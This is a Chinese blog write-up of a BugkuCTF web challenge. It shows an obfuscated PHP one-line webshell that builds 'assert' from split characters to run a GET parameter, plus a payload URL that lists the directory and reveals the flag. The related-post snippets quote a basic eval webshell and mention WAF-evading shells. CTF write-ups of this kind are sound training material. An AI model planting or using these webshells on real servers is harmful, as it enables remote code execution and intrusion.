【bugkuctf】过狗一句话 writeup

最新推荐文章于 2020-07-19 14:19:51 发布
最新推荐文章于 2020-07-19 14:19:51 发布
阅读量1.2k 收藏
点赞数 1

过狗一句话
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

用assert执行任意代码 

payload:http://120.24.86.145:8010/?s=print_r(scandir('./')); 扫描目录 

目录下存在f14g.txt即为flag:BUGKU{bugku_web_009801_a}

yusec
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFweb篇-一句话木马
weixin_44597701的博客
08-05 5406
什么是一句话木马 一句话木马就是将一段代码植入服务器中,然后通过蚁剑就可以直接拿到webshell 最简单的一句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack,至于为什么,这需要祥看蚁剑的原理 为了防止D盾的阻拦,经常可以使用不同的混淆来绕开D盾 一句话木马的条件 (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 例题 先用御剑扫描一下 发现后台地址 然后进入输入root 密码空(至于为什
BugkuCTF过狗一句话(web)
s0il的博客
04-19 2442
题目描述: 上面的php进行格式化之后: <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_...
bugku 过狗一句话 writeup
xuchen16的博客
09-21 1856
参考:https://blog.csdn.net/qq_30464257/article/details/81160181                 PHP file_get_contents() 函数   例子 &lt;?php echo file_get_contents("test.txt"); ?&gt; 输出: This ...
Bugku web 过狗一句话
Amire0x的小乐园
05-05 318
学到了以前不知道的新东西 题目链接 直接看代码 explode():使用一个字符串分割整个字符串,并返回由字符串组成的数组。 assert():把字符串按照php代码来执行。 这样一来$poc_2就是assert, 即现在的结果是assert($_GET['s']) 这下就可以估计flag应该是藏在某个文件里了 于是用到一个扫描目录的函数 scandir()列出指定路径中的文件和目录 glob()...
过狗一句话bugku)
hhh
10-20 1196
       昨天写了个关于一句话木马的题,今天上午百度了一个上午理解一句话木马,感jio还是有点懵逼,于是想写一下题来理解一下下……不过虽然这道题题目叫过狗一句话,但似乎跟我想象的不大一样emmmmm ----------------------------------------------------------不废话不废话----------------------我是分割线分割线---...
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
bugku杂项题writeup
11-22
bugku杂项题writeup
CTF比赛收集的赛题和writeup.zip
最新发布
09-30
"CTF比赛收集的赛题和writeup.zip"是一个包含这些挑战赛题和解决方案的压缩包,对于学习和提高网络安全技能非常有价值。 在"CTF-WP-main"这个压缩包子文件中,我们可以期待找到以下几个方面的知识点: 1. **逆向...
最新PHP免杀过狗免杀WAF2k大马shell
02-02
最新PHP免杀过狗免杀WAF2k大马shell/仅用于技术研究请勿非法使用
bugkuctf web基础部分 writeup
river
03-20 2833
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
bugku 中国菜刀 writeup
ZKCQM23的博客
03-20 3462
自己真的是很愚笨,参考了很多,才终于了解了。用 wireshark 写的也参考了很多大神的写法http://www.bugku.com/thread-11-1-1.html也有位大佬补充了一点http://blog.csdn.net/Sanky0u/article/details/76167670但考虑可能小白真的白(比如我),所以根据自己的思路再补充一点(做这个真的有点抓狂了,所以想补充)用wi...
CTF-入门九
realstarstarli的博客
07-19 1188
CTF-入门九 这里继续bugku web的题解记录. 秋名山老司机 拿到这道题,告诉你们在两秒之内提交答案,手动肯定是不行的。 两秒内刷新是这样的页面,这里也可以知道是post方法传值 这里给出脚本,网上的脚本大同小异,这里按照惯例优化了一下代码并给出完整的代码注释 import requests from bs4 import BeautifulSoup #获取网页内容,并且提取<div>内容 ''' 通过我们对于题目的源代码的分析可知,在两秒内刷新页面会得到不一样的结果 这里其实是会话
木马学习笔记 1【一句话木马篇】
Sp4rkW的博客
10-27 7087
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理 1.最最最最基础一句话 eval($_POST["...
linux/php一句话图片马及实例
热门推荐
极光时流
09-24 1万+
Ubuntu一句话图片马 准备一张图片tu.jpeg、phpinfo.php和hack.php; Phpinfo.php文件内容: hack.php文件内容: 准备一个16进制软件UE(UltraEdit),linux下载地址:https://www.cr173.com/soft/265552.html 以及装有hackbar的火狐; 中国菜刀,下载地址:https://down...
bugku】 cookies欺骗 writeup
perye
02-27 2968
看到url上的参数有base64,解码发现是keys.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- import requests s=requests.Session() url='http://120.24.86.145:8002/web11/in...
bugku-多次 (详细)
偷一个月亮
06-20 1853
第一个考点:异或注入判断过滤关键字 ?id=1’^(length(‘union’)!=0)–+ 过滤的用双写绕过 GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值